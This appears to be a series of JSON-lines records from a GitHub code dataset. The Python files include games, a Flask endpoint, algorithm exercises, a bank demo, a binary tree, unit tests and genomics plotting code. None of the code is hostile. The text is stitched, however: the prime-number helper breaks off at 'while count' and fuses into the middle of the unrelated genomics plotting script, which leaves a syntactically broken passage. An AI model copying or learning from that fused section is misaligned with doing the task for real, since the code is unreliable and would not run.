self.cursor_offset, self.pve_game_y)\n                self.cursor = 'o'\n                self.state = 'PVE'\n\n    def check_input(self):\n        \"\"\"Move cursor and when START_KEY is pressed open LPVP or PVE game mode or Credits screen\"\"\"\n        self.move_cursor()\n        if self.game.START_KEY:\n            if self.state == 'LPVP':\n                self.game.game_mode = 'LPVP'\n                self.game.playing = True\n            elif self.state == 'PVE':\n                self.game.game_mode = 'PVE'\n                self.game.playing = True\n            elif self.state == 'Credits':\n                self.game.game_mode = ''\n                self.game.current_menu = self.game.credits_menu\n                
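                # Presumably the outer game loop reads game.current_menu and shows\n                # the credits screen once this menu's display loop stops below.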
self.run_display = False # Don't show the menu\n","repo_name":"psylocube/tic-tac-toe","sub_path":"game/menu/tic_tac_toe_menu.py","file_name":"tic_tac_toe_menu.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41413327760","text":"from controllers.dataHandler import *\nfrom flask import Flask, request\n\napp = Flask(__name__)\n\n@app.route('/data', methods = ['POST'])\ndef data():\n    params = request.data\n    return insertData(params)\n\n@app.route('/get-avg', methods = ['GET'])\ndef avgData():\n    lat = request.args.get('lat')\n    lon = request.args.get('lon')\n    return getAvgData(lat, lon)\n\nif __name__ == \"__main__\":\n    app.run()","repo_name":"YasminSimana/breezometer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72969370600","text":"class MyCalendarTwo(object):\n\n    def __init__(self):\n        self.calendars = []\n        self.overlaps = []\n\n    def book(self, start, end):\n        \"\"\"\n        :type start: int\n        :type end: int\n        :rtype: bool\n        \"\"\"\n        for ov in self.overlaps:\n            if start < ov[1] and end > ov[0]:\n                return False\n        for cl in self.calendars:\n            if start < cl[1] and end > cl[0]:\n                self.overlaps.append([max(start, cl[0]), min(end, cl[1])])\n        self.calendars.append([start, end])\n        return True\n    \n    \n\n\n# Your MyCalendarTwo object will be instantiated and called as such:\n# obj = MyCalendarTwo()\n# param_1 = obj.book(start,end)","repo_name":"adityabohra007/Coding","sub_path":"731. My Calendar II.py","file_name":"731. My Calendar II.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"74453457004","text":"'''\nThis module attempts to plot the activations considered for the Neural Networks\n'''\n\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef melu(x, α=0.49):\n    ''' Custom ELU activation function which ensures C2 '''\n    multiplier = (x>0)*((x/2 + 1 - 2*α)/(x + 1/α - 2)) + (x<0)*1\n    return F.elu(x) * multiplier\n\ndef plotActivations():\n    ''' Diagnostic method to plot melu '''\n    x = torch.Tensor(np.arange(-2,2,0.1))\n    y = melu(x)\n    plt.plot(x.numpy(),y.numpy(),'r',label=\"MELU\")\n    y = F.gelu(x)\n    plt.plot(x.numpy(),y.numpy(),'g',label=\"GELU\")\n    y = F.elu(x)\n    plt.plot(x.numpy(),y.numpy(),'b',label=\"ELU\")\n    plt.legend(loc=\"upper left\")\n\nif __name__ == \"__main__\":\n    plotActivations()","repo_name":"ObonyoRichard/Fractal-Blackscholes-model-calibration","sub_path":"Code/Activations.py","file_name":"Activations.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33099554584","text":"import random\r\nfrom random import randint\r\n\r\nlines=colomns=8\r\nboard=[[random.randrange(0,2,1) for i in range(colomns)] for j in range(lines)] # create a board with randomly filled cells: 0 means empty, 1 means a piece is there\r\n\r\n# function that draws the board\r\ndef draw_board(board):\r\n\tprint('  1 2 3 4 5 6 7 8')\r\n\tprint('A', board[0])\r\n\tprint('B', board[1])\r\n\tprint('C', board[2])\r\n\tprint('D', board[3])\r\n\tprint('E', board[4])\r\n\tprint('F', board[5])\r\n\tprint('G', board[6])\r\n\tprint('H', board[7])\r\n\r\n# function that removes the row or column entered by the player\r\ndef delete(players_move, board, colomns, lines):\r\n\tif players_move=='a':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[0][i]=0\r\n\telif players_move=='b':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[1][i]=0\r\n\telif players_move=='c':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[2][i]=0\r\n\telif players_move=='d':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[3][i]=0\r\n\telif players_move=='e':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[4][i]=0\r\n\telif players_move=='f':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[5][i]=0\r\n\telif players_move=='g':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[6][i]=0\r\n\telif players_move=='h':\r\n\t\tfor i in range(colomns):\r\n\t\t\tboard[7][i]=0\r\n\telse:\r\n\t\tplayers_move=int(players_move)\r\n\t\tfor i in range(lines):\r\n\t\t\tboard[i][players_move-1]=0\r\n\t\r\n\r\np1=str(input(\"what is the name of the player number 1? \\n\")) # ask for the first player's name\r\np2=str(input(\"what is the name of the player number 2? \\n\")) # ask for the second player's name\r\nn=0\r\ndraw_board(board) # draw the board\r\n\r\nplayers_move=input('What is your move?\\n') # ask for the player's move\r\nwhile board.count([0]*lines)!=lines: # until every cell of the board is zero\r\n\tn+=1 # move counter, used to track whose turn it is\r\n\tdelete(players_move, board, colomns, lines) # remove the pieces\r\n\tif board.count([0]*lines)==lines: # stop without asking for another move once no pieces are left\r\n\t\tbreak \r\n\tdraw_board(board) # redraw the board with the updated values \r\n\tplayers_move=input('What is your move?\\n') # ask for the player's next move\r\n\r\nif n%2==0:\r\n\tprint(p2)\r\nelse:\r\n\tprint(p1)\t","repo_name":"VM5Ball/-Fin-Uni","sub_path":"Супер НИМ.py","file_name":"Супер НИМ.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5033504147","text":"def factors(n):\n\tfactor_list = []\n\tfor i in range(1,n+1):\n\t\tif n%i == 0:\n\t\t\tfactor_list.append(i)\n\treturn(factor_list)\n\ndef isprime(n):\n\tif len(factors(n)) == 2: return True\n\telse: return False\n\ndef nprimes(n):\n\t(count,i,plist) = (0,1,[])\n\twhile count 0.95).apply(int)\n    df['SET_IMPACT_GENE'] = ((df.CADD13_PHRED > 25) |\n                            (df.Loss_of_function == True)).apply(int)\n    df['SET_IMPACT'] = ((df.SET_IMPACT_NON_GENIC == True) |\n                        (df.SET_IMPACT_GENE == True)).apply(int)\n\n#Function to make tables for plotting (descriptive)\n\ndef make_summary_table_with_CI(df, category='DUMMY'):\n    '''make a summary table for counts that are available for plotting and also\n    allow to annotate the 95% CI. relies on restricting input by category, so\n    that the numbers are plotted correctly. 
Dummy will include all.'''\n \n df_ = df.copy()\n \n df_['DUMMY'] = 1\n \n df_ = df_[df_[category] == True]\n \n df_ = df_.groupby(['INDIVIDUAL', 'MUTSIG_CLASS']).count().reset_index()\n \n \n df0 = df.groupby(['INDIVIDUAL', 'MUTSIG_CLASS']).count().reset_index()\n df0 = df0[['INDIVIDUAL', 'MUTSIG_CLASS']]\n df0['POS1'] = 0\n \n df_ = pd.concat([df_, df0], sort=True)\n df_ = df_.groupby(['INDIVIDUAL', 'MUTSIG_CLASS']).sum().reset_index()\n \n df_s = df_.copy()\n \n df_ = df_.groupby(['MUTSIG_CLASS']).POS1.describe()\n \n cis = st.t.interval(0.95, np.add(df_['count'], -1), loc=df_['mean'],\n scale=df_['std']/df_['count']**0.5)\n \n df_['95CI_LOWER'] = cis[0]\n df_['95CI_UPPER'] = cis[1]\n \n return df_, df_s\n\n\ndef make_estimation_table(df):\n \n df_ = df[(df.MUTSIG_CLASS.isin(['1_sperm', '2_shared'])) &\n (df.SET_IMPACT_GENE == True)]\n \n df_ = df_.groupby('INDIVIDUAL').count().reset_index()\n \n df0 = df.groupby(['INDIVIDUAL']).count().reset_index()\n df0 = df0[['INDIVIDUAL']]\n df0['POS1'] = 0\n \n df_ = pd.concat([df_, df0], sort=True)\n df_ = df_.groupby(['INDIVIDUAL']).sum().reset_index()\n \n df_ = df_.POS1.describe()\n \n cis = st.t.interval(0.95, np.add(df_['count'], -1), loc=df_['mean'],\n scale=df_['std']/df_['count']**0.5)\n \n df_['95CI_LOWER'] = cis[0]\n df_['95CI_UPPER'] = cis[1]\n \n df_ = df_[['mean', '95CI_LOWER', '95CI_UPPER']]\n \n #Data provided by XY: {ALL:68556364bp; HI:17651035; SFARI:3185225\n \n df_100 = df_ * 100\n df_100_hi = df_100 * 17651035 / 68556364\n df_100_sfari = df_100 * 3185225 / 68556364\n \n df_100['SUBGROUP'] = 'ALL_GENES'\n df_100_hi['SUBGROUP'] = 'HI_GENES'\n df_100_sfari['SUBGROUP'] = 'SFARI_HI'\n \n df_complete = pd.concat([df_100, df_100_hi, df_100_sfari], axis=1).T\\\n .reset_index()\n \n return df_complete\n\n#Functions to prepare for permutation enrichment analysis\n\ndef assemble_simulations(path):\n '''new version where shuffle_summary for everything is already generated by\n XY and allows to load with a category.'''\n \n df = pd.read_csv(path, sep='\\t')\n \n df.rename({'hg19_early_timing_PMID19966280': 'early_timing_PMID19966280',\n 'hg19_late_timing_PMID19966280': 'late_timing_PMID19966280'},\n axis=1, inplace=True)\n \n df.sort_values(by='GROUP', inplace=True)\n \n groups = df.GROUP.unique().tolist()\n mscs = ['1_sperm', '2_shared', '3_soma_y', '4_soma_o']\n cats = ['cc', 'gnomAD', 'ssc']\n \n mscs_cats = [(cat, msc) for cat in cats for msc in mscs]\n \n dictionary = {grp: msc_cat for grp, msc_cat in zip(groups, mscs_cats)}\n \n df['CATEGORY_ShufgnoSSC'] = df.apply(lambda row: dictionary[row.GROUP][0],\n axis=1)\n \n df['MUTSIG_CLASS'] = df.apply(lambda row: dictionary[row.GROUP][1], axis=1)\n \n df = df.groupby(['CATEGORY_ShufgnoSSC', 'MUTSIG_CLASS'])\\\n .describe(percentiles=[0.025, 0.975])\n \n df.reset_index(inplace=True)\n \n return df\n\n\ndef load_actual_fractions(path):\n '''percentage_of_features.csv; no changing required. 
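    (assumed layout, inferred from plot_anno_fractions below rather than from the file itself: a CSV with at least ANNO and PERCENTAGE columns, one row per annotation track)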
use the PERCENTAGE\n column for the fraction readout.'''\n \n return pd.read_csv(path)\n\n\ndef process_lymph_semi(path):\n '''import .csv with all data from lymphona or seminoma.'''\n \n df = pd.read_csv(path)\n \n df.rename({'hg19_early_timing_PMID19966280': 'early_timing_PMID19966280',\n 'hg19_late_timing_PMID19966280': 'late_timing_PMID19966280'},\n axis=1, inplace=True)\n \n df['One'] = 1\n df['Zonk'] = 'zonk'\n df_ = df.groupby('Zonk').sum()\n df_ = df_.apply(lambda row: row / row['One'], axis=1)\n df_ = df_.stack().reset_index().sort_values('level_1')\n \n return df_\n\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#Plotting\ndef plot_category_counts(df):\n '''simplified and optimized version to plot for this specific problem. Can\n be more customizable if not using a split first frame and giving the cats\n of interest as an argument.'''\n \n categories = ('IS_MOSAIC', 'SET_EXON', 'SET_IMPACT_GENE')\n ranges = (-0.3, -0.1, 0.1, 0.3)\n colors=['g', 'xkcd:brown', 'xkcd:golden', 'xkcd:orangish red'] \n fig = plt.figure()\n \n axs = []\n \n for i in [1,4]: #suplots start at 1, not 0\n axs.append(fig.add_subplot(2,3,i))\n for i in range (2,4):\n axs.append(fig.add_subplot(1,3,i))\n \n for i in range(len(axs)):\n \n if i == 0:\n cat = categories[0]\n elif i == 1:\n cat = categories[0]\n else:\n cat = categories[i-1]\n \n df_, df_s = make_summary_table_with_CI(df, cat)\n df_['PLOTTER'] = cat\n df_s['PLOTTER'] = cat\n df_s.sort_values(by='MUTSIG_CLASS', inplace=True)\n \n sns.stripplot(x='PLOTTER', y='POS1', hue='MUTSIG_CLASS', data=df_s,\n dodge=True, ax=axs[i], alpha=0.5, s=4, palette=colors)\n axs[i].errorbar(x=ranges, y=df_['mean'],\n yerr=np.subtract(df_['95CI_UPPER'], df_['mean']),\n marker='d', ms=10, mfc='k',mec ='k', ecolor='k', ls='',\n capsize=5)\n \n plt.subplots_adjust(hspace=0.1)\n \n axs[0].set_ylim(50,500)\n axs[0].set_yticks([50, 250, 500])\n axs[0].set_xticks([])\n axs[0].set_xlabel('')\n axs[0].set_xticklabels('')\n axs[0].set_ylabel('Number of Mosaic Variants')\n \n axs[1].set_ylim(0,50)\n axs[1].set_yticks([0, 25, 50])\n axs[1].set_xlabel('All Variants')\n axs[2].set_ylim(-0.5, 20)\n axs[2].set_yticks([0, 5, 10, 15, 20])\n axs[2].set_xlabel('Exonic Variants')\n axs[3].set_ylim(-0.2, 6)\n axs[3].set_yticks([0, 2, 4, 6])\n axs[3].set_xlabel('CADD > 25/LoF')\n \n sns.despine(bottom=True, offset=5, trim=True, ax=axs[0])\n \n for i in range(1,4):\n axs[i].get_legend().remove()\n axs[i].set_ylabel('')\n axs[i].set_xticks([])\n axs[i].set_xticklabels('')\n sns.despine(bottom=True, offset=5, trim=True, ax=axs[i])\n \n plt.show()\n\n\ndef plot_estimates(df):\n \n df = make_estimation_table(df)\n \n sns.pointplot()\n #fix, as sns.despine does not work with categorical other than sns\n #same is true for the post-labeling\n plt.errorbar(x=[0,1,2], y=df['mean'],\n yerr=np.subtract(df['mean'], df['95CI_LOWER']), marker='d',\n ms=10, mfc='k',mec ='k',ls='', capsize=5, ecolor='k')\n \n plt.ylim(0,50)\n plt.ylabel('Number of Variants per 100 Men')\n sns.despine(offset=5, trim=True)\n plt.xticks(ticks=[0,1,2], labels=df['SUBGROUP'].tolist(), rotation=45)\n \n plt.xticks()\n \n plt.show()\n\n#------------------------------------------------------------------------------\ndef plot_anno_sims(df, sims, category='cc'):\n '''input is the mos_nob table and the assembled sims results.'''\n \n sims = sims[sims.CATEGORY_ShufgnoSSC == category]\n sims.drop('CATEGORY_ShufgnoSSC', axis=1, inplace=True)\n sims.set_index('MUTSIG_CLASS', inplace=True)\n \n 
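    # The four dodge offsets in `ranges` and the four colors below line up with\n    # the four MUTSIG_CLASS groups (1_sperm, 2_shared, 3_soma_y, 4_soma_o).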
colors=['g', 'xkcd:brown', 'xkcd:golden', 'xkcd:orangish red'] \n \n columns = list(set([col[0] for col in sims.columns]))\n columns.sort()\n \n ranges = make_ranges(columns)\n \n df = df.copy()[columns + ['MUTSIG_CLASS', 'IS_MOSAIC']]\n \n df['wgEncodeRegTfbsClusteredV3'] = df.wgEncodeRegTfbsClusteredV3.fillna(0)\\\n .apply(lambda x: x != 0)\n df['wgEncodeRegDnaseClusteredV3'] = df.apply(lambda row:\n row.wgEncodeRegDnaseClusteredV3 == True,\n axis=1)\n \n df_ = df.groupby('MUTSIG_CLASS').sum()\n \n #is_mosaic was all 1, so effectively replaces a SUM column\n df_ = df_.apply(lambda row: row / row['IS_MOSAIC'], axis=1)\n df_.reset_index(inplace=True)\n \n df_ = df_.groupby(['IS_MOSAIC', 'MUTSIG_CLASS']).sum().stack()\\\n .reset_index()\n df_.sort_values(by=['level_2', 'MUTSIG_CLASS'], inplace=True)\n \n sims_ = sims.unstack().reset_index()\\\n .sort_values(by=['level_0', 'MUTSIG_CLASS'])\n means = sims_[sims_.level_1 == 'mean'][0]\n errors = sims.stack().stack().unstack(1).reset_index()\\\n .sort_values(by=['level_1', 'MUTSIG_CLASS'])\\\n [['2.5%', '97.5%']]\n minus = abs(errors['2.5%'].values - means.values)\n plus = abs(means.values - errors['97.5%'].values)\n errors_plotting = [minus, plus]\n \n ecolors = ['0.5' if((value >= error_lst[0]) & (value <= error_lst[1]))\n else 'r'\n for value, error_lst in zip(df_[0].values, errors.values)]\n \n #actual plotting\n sns.stripplot(x='level_2', y=0, hue='MUTSIG_CLASS', data=df_,\n palette=colors, dodge=True, jitter=False)\n \n plt.errorbar(x=ranges, y=means, yerr=errors_plotting, linestyle='',\n marker='_', mfc='0.5', mec='0.5', alpha=0.5, elinewidth=5,\n ecolor=ecolors)\n \n plt.ylim(0,0.71)\n plt.xlabel('')\n plt.ylabel('Fraction of Variants')\n sns.despine(offset=5, trim=True)\n plt.xticks(rotation=45, ha='right')\n \n ax = plt.gca()\n \n ax.get_legend().remove()\n \n plt.show()\n \ndef make_ranges(columns):\n \n ranges = []\n \n for i in range(len(columns)):\n ranges.append(i - 0.3)\n ranges.append(i - 0.1)\n ranges.append(i + 0.1)\n ranges.append(i + 0.3)\n \n return ranges\n \n#------------------------------------------------------------------------------\n\ndef plot_anno_fractions(df, fractions):\n '''input is the mos_nob anno df and the fractions from XY.'''\n \n colors=['g', 'xkcd:brown', 'xkcd:golden', 'xkcd:orangish red'] \n \n columns = fractions.ANNO.sort_values().unique().tolist()\n \n ranges = [i for i in range(len(columns))]\n \n df = df.copy()[columns + ['MUTSIG_CLASS', 'IS_MOSAIC']]\n \n df['wgEncodeRegTfbsClusteredV3'] = df.wgEncodeRegTfbsClusteredV3.fillna(0)\\\n .apply(lambda x: x != 0)\n df['wgEncodeRegDnaseClusteredV3'] = df.apply(lambda row:\n row.wgEncodeRegDnaseClusteredV3 == True,\n axis=1)\n \n df_ = df.groupby('MUTSIG_CLASS').sum()\n \n #is_mosaic was all 1, so effectively replaces a SUM column\n df_ = df_.apply(lambda row: row / row['IS_MOSAIC'], axis=1)\n df_.reset_index(inplace=True)\n \n fractions = fractions[~fractions.PERCENTAGE.duplicated()]\n fractions.sort_values(by='ANNO', inplace=True)\n \n df_ = df_.groupby(['IS_MOSAIC', 'MUTSIG_CLASS']).sum().stack()\\\n .reset_index()\n df_.sort_values(by=['level_2', 'MUTSIG_CLASS'], inplace=True)\n \n sns.stripplot(x='level_2', y=0, hue='MUTSIG_CLASS', data=df_,\n palette=colors, dodge=True)\n \n plt.hlines(y=fractions.PERCENTAGE, xmin=np.subtract(ranges, 0.45),\n xmax=np.add(ranges, 0.45), colors='w')\n plt.hlines(y=fractions.PERCENTAGE, xmin=np.subtract(ranges, 0.45),\n xmax=np.add(ranges, 0.45), colors='k', linestyles='dotted')\n \n plt.xticks(rotation=45)\n \n 
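#dotted reference lines mark the feature fractions provided by XY\n 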
plt.show()\n \n\ndef plot_anno_sims_lymph_semi(df, sims, lymph, semi, category='cc'):\n '''input is the mos_nob table and the assembled sims results. note that for\n exons only the input of the df has to be adjusted accordingly, i.e. the df\n has to be adjusted to include gene region only.'''\n \n sims = sims[sims.CATEGORY_ShufgnoSSC == category]\n sims.drop('CATEGORY_ShufgnoSSC', axis=1, inplace=True)\n sims.set_index('MUTSIG_CLASS', inplace=True)\n \n colors=['g', 'xkcd:brown', 'xkcd:golden', 'xkcd:orangish red'] \n \n columns = list(set([col[0] for col in sims.columns]))\n columns.sort()\n \n ranges = make_ranges(columns)\n \n ranges_lines = [i for i in range(len(columns))]\n \n df = df.copy()[columns + ['MUTSIG_CLASS', 'IS_MOSAIC']]\n \n df['wgEncodeRegTfbsClusteredV3'] = df.wgEncodeRegTfbsClusteredV3.fillna(0)\\\n .apply(lambda x: x != 0)\n df['wgEncodeRegDnaseClusteredV3'] = df.apply(lambda row:\n row.wgEncodeRegDnaseClusteredV3 == True,\n axis=1)\n \n df_ = df.groupby('MUTSIG_CLASS').sum()\n \n lymph = lymph[lymph.level_1.isin(columns)]\n semi = semi[semi.level_1.isin(columns)]\n \n #is_mosaic was all 1, so effectively replaces a SUM column\n df_ = df_.apply(lambda row: row / row['IS_MOSAIC'], axis=1)\n df_.reset_index(inplace=True)\n \n df_ = df_.groupby(['IS_MOSAIC', 'MUTSIG_CLASS']).sum().stack()\\\n .reset_index()\n df_.sort_values(by=['level_2', 'MUTSIG_CLASS'], inplace=True)\n \n sims_ = sims.unstack().reset_index()\\\n .sort_values(by=['level_0', 'MUTSIG_CLASS'])\n means = sims_[sims_.level_1 == 'mean'][0]\n errors = sims.stack().stack().unstack(1).reset_index()\\\n .sort_values(by=['level_1', 'MUTSIG_CLASS'])\\\n [['2.5%', '97.5%']]\n minus = abs(errors['2.5%'].values - means.values)\n plus = abs(means.values - errors['97.5%'].values)\n errors_plotting = [minus, plus]\n \n ecolors = ['0.5' if((value >= error_lst[0]) & (value <= error_lst[1]))\n else 'r'\n for value, error_lst in zip(df_[0].values, errors.values)]\n \n #actual plotting\n sns.stripplot(x='level_2', y=0, hue='MUTSIG_CLASS', data=df_,\n palette=colors, dodge=True, jitter=False)\n \n plt.errorbar(x=ranges, y=means, yerr=errors_plotting, linestyle='',\n marker='_', mfc='0.5', mec='0.5', alpha=0.5, elinewidth=5,\n ecolor=ecolors)\n \n plt.hlines(y=lymph[0], xmin=np.subtract(ranges_lines, 0.45),\n xmax=np.add(ranges_lines, 0.45), colors='w')\n plt.hlines(y=lymph[0], xmin=np.subtract(ranges_lines, 0.45),\n xmax=np.add(ranges_lines, 0.45), colors='r',\n linestyles='dotted')\n \n plt.hlines(y=semi[0], xmin=np.subtract(ranges_lines, 0.45),\n xmax=np.add(ranges_lines, 0.45), colors='w')\n plt.hlines(y=semi[0], xmin=np.subtract(ranges_lines, 0.45),\n xmax=np.add(ranges_lines, 0.45), colors='b',\n linestyles='dotted')\n \n plt.ylim(0,1.)\n plt.xlabel('')\n plt.ylabel('Fraction of Variants')\n sns.despine(offset=5, trim=True)\n plt.xticks(rotation=45, ha='right')\n \n ax = plt.gca()\n \n ax.get_legend().remove()\n \n plt.show()\n \n \n \n \n \n \n \n \n \n\n\n\n\n\n\n\n\n","repo_name":"shishenyxx/Sperm_control_cohort_mosaicism","sub_path":"Plot/cc_annotation_counts02.py","file_name":"cc_annotation_counts02.py","file_ext":"py","file_size_in_byte":16706,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"32600441223","text":"\r\nfrom bank import Bank, Loan\r\nfrom admin import Admin\r\nfrom user import User\r\n\r\ndef main():\r\n bank = Bank()\r\n\r\n admin = Admin(bank)\r\n admin.login()\r\n\r\n bank.create_account(\"user1@example.com\", \"user123\")\r\n 
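# second demo account, used below as the transfer recipient\r\n 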
bank.create_account(\"user2@example.com\", \"user234\")\r\n\r\n user1 = User(bank, \"user1@example.com\", \"user123\")\r\n user1.login()\r\n\r\n print(' ')\r\n user1.deposit(1000)\r\n user1.check_balance()\r\n\r\n print(' ')\r\n user1.withdraw(500)\r\n user1.check_balance()\r\n\r\n print(' ')\r\n user2 = User(bank, \"user2@example.com\", \"user234\")\r\n user2.login()\r\n\r\n user1.transfer(200, \"user2@example.com\")\r\n user1.check_balance()\r\n user2.check_balance()\r\n\r\n print(' ')\r\n user1.get_transaction_history()\r\n print(' ')\r\n user2.get_transaction_history()\r\n print(' ')\r\n\r\n user1.take_loan()\r\n\r\n admin.check_total_balance()\r\n admin.check_total_loan()\r\n\r\n admin.loan_feature(True)\r\n\r\n user2.take_loan()\r\n\r\n admin.check_total_balance()\r\n admin.check_total_loan()\r\n\r\n print(' ')\r\n user1.logout()\r\n user2.logout()\r\n\r\n admin.logout()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Tasmia-Mitu/OOP-Final-Exam","sub_path":"OOP_Final_Exam/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6492573598","text":"class Point:\n x = 1\n y = 2\n\n def setCoords(self, x, y):\n self.a = x\n self.b = y\n\npt1 = Point()\npt1.setCoords(5, 10)\nprint( pt1.__dict__ )\n# экввивалент\nPoint.setCoords(pt1, 11, 22)\nprint( pt1.__dict__ )\n\npt2 = Point()\npt2.setCoords(50, 100)\nprint( pt2.__dict__ )","repo_name":"sazanov-ilya/2-classes","sub_path":"#002 методы класса, параметр self, конструктор и деструктор/v2.py","file_name":"v2.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12886918894","text":"class Node(object):\n def __init__(self,value):\n self.value=value\n self.left=None\n self.right= None\n\nclass BinaryTree(object):\n def __init__(self,root):\n self.root = Node(root)\n\n def print_tree(self):\n self.preorder_print(self.root)\n\n def preorder_print(self,node):\n if node is None:\n return\n print(node.value)\n self.preorder_print(node.left)\n self.preorder_print(node.right)\n\n def search(self,key):\n return self.preorder_search(self.root,key)\n\n def preorder_search(self,node,key):\n if node is None:\n return(False)\n\n if node.value == key:\n return(True)\n\n return self.preorder_search(node.left,key) or self.preorder_search(node.right,key)\n\nb = BinaryTree(1)\nb.root.left = Node(2)\nb.root.right = Node(3)\nb.root.left.left = Node(4)\nb.root.left.right = Node(5)\n\nb.print_tree()\n\np = b.search(4)\nprint(p)\np= b.search(100)\nprint(p)","repo_name":"hemanthkumarsheetha/AlgoPractice","sub_path":"Practice/binarytree.py","file_name":"binarytree.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23190027675","text":"from time import sleep\ndef ajuda(com):\n help(com)\n\ndef titulo(msg):\n tam=len(msg)+4\n print('~'*tam)\n print(f' {msg}')\n print('~'*tam)\n\n\nwhile True:\n titulo('SISTEMA DE AJUDA')\n hp= str(input('Função ou biblioteca >'))\n if hp.upper() == 'FIM':\n break\n else:\n print(f\"Acessando o manual de comando '{hp}'...\")\n sleep(2)\n print('~~'*30)\n 
ajuda(hp)\nprint('FINALIZADO')\n\n\n\n\n","repo_name":"Franky03/MyCodes","sub_path":"Exercises/exe106.py","file_name":"exe106.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"6905832918","text":"import unittest\nimport logging\n\nfrom utils import mylogconfig\nimport models\nfrom models.solver import solve\nfrom models.game_states import GameState\nfrom models.game_trees import set_current_tree\n\n\"\"\" following code doesn't work for debugger --> uncomment\n\"\"\"\nmylogconfig.standard_rot(level=logging.INFO)\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nclass TestSolver(unittest.TestCase):\n\n def all_levels(self, level):\n gs = GameState([0, 0, 1, 0, 0])\n gm, cont = solve(gs, level)\n self.assertTrue(gm is None and cont == -1)\n gs = GameState([1, 0, 1, 0, 0])\n gm, cont = solve(gs, level)\n self.assertTrue(gm.row_index in [0, 2] and gm.match_count == 1 and cont == 0)\n gs = GameState([0, 0, 3, 0, 0])\n gm, cont = solve(gs, level)\n self.assertTrue(gm.row_index == 2 and 1 <= gm.match_count <= 2 and ((gm.match_count == 1) == (cont > 0)))\n\n def test_1init(self):\n gs = GameState([1, 2, 3, 4, 5])\n try:\n solve(gs, 3)\n self.assertTrue(False)\n except models.solver.Error:\n pass\n\n def test_2random(self):\n self.all_levels(0)\n gs = GameState([0, 0, 0, 4, 5])\n gm, cont = solve(gs, 0)\n self.assertTrue(gm.row_index in [3, 4] and 1 <= gm.match_count <= 3 and cont > 0)\n\n def test_3most_first(self):\n self.all_levels(1)\n gs = GameState([1, 2, 3, 4, 5])\n gm, cont = solve(gs, 1)\n self.assertTrue(gm.row_index == 4 and gm.match_count == 3 and cont == 1)\n gs = GameState([0, 0, 3, 2, 1])\n gm, cont = solve(gs, 1)\n self.assertTrue(gm.row_index == 2 and gm.match_count == 3 and cont == 1)\n gs = GameState([0, 2, 1, 1, 1])\n gm, cont = solve(gs, 1)\n self.assertTrue(gm.row_index == 1 and gm.match_count == 2 and cont == 1)\n gs = GameState([0, 2, 0, 0, 1])\n gm, cont = solve(gs, 1)\n self.assertTrue(gm.row_index == 1 and gm.match_count == 2 and cont == 0)\n\n def test_4best(self):\n set_current_tree(GameState([1, 2, 3, 4, 5]))\n self.all_levels(2)\n # winning states\n gs = GameState([0, 2, 1, 1, 1])\n gm, cont = solve(gs, 2)\n self.assertTrue(gm.row_index == 1 and gm.match_count == 2 and cont == 3)\n gs = GameState([1, 2, 3, 4, 5]) # see logs of 12345 in test_game_trees\n gm, cont = solve(gs, 2)\n self.assertTrue(cont == 3)\n # looser states\n gs = GameState([0, 1, 1, 0, 1])\n gm, cont = solve(gs, 2)\n self.assertTrue(gm.match_count == 1 and cont == 2)\n gs = GameState([1, 2, 0, 4, 3]) # see logs of 01234 in test_game_trees\n gm, cont = solve(gs, 2)\n self.assertTrue(gm.match_count == 1 and cont == 2)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"BrunoLustenberger/matchTaker","sub_path":"tests/test_solver.py","file_name":"test_solver.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35358624580","text":"import pytest\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\n\nfrom baal.bayesian.weight_drop import WeightDropLinear, WeightDropConv2d,\\\n patch_module, MCDropoutConnectModule\n\n\nclass DummyDataset(Dataset):\n def __len__(self):\n return 20\n\n def __getitem__(self, item):\n return torch.from_numpy(np.ones([3, 10, 10]) * item / 255.).float(), torch.FloatTensor([item % 2])\n\n\nclass 
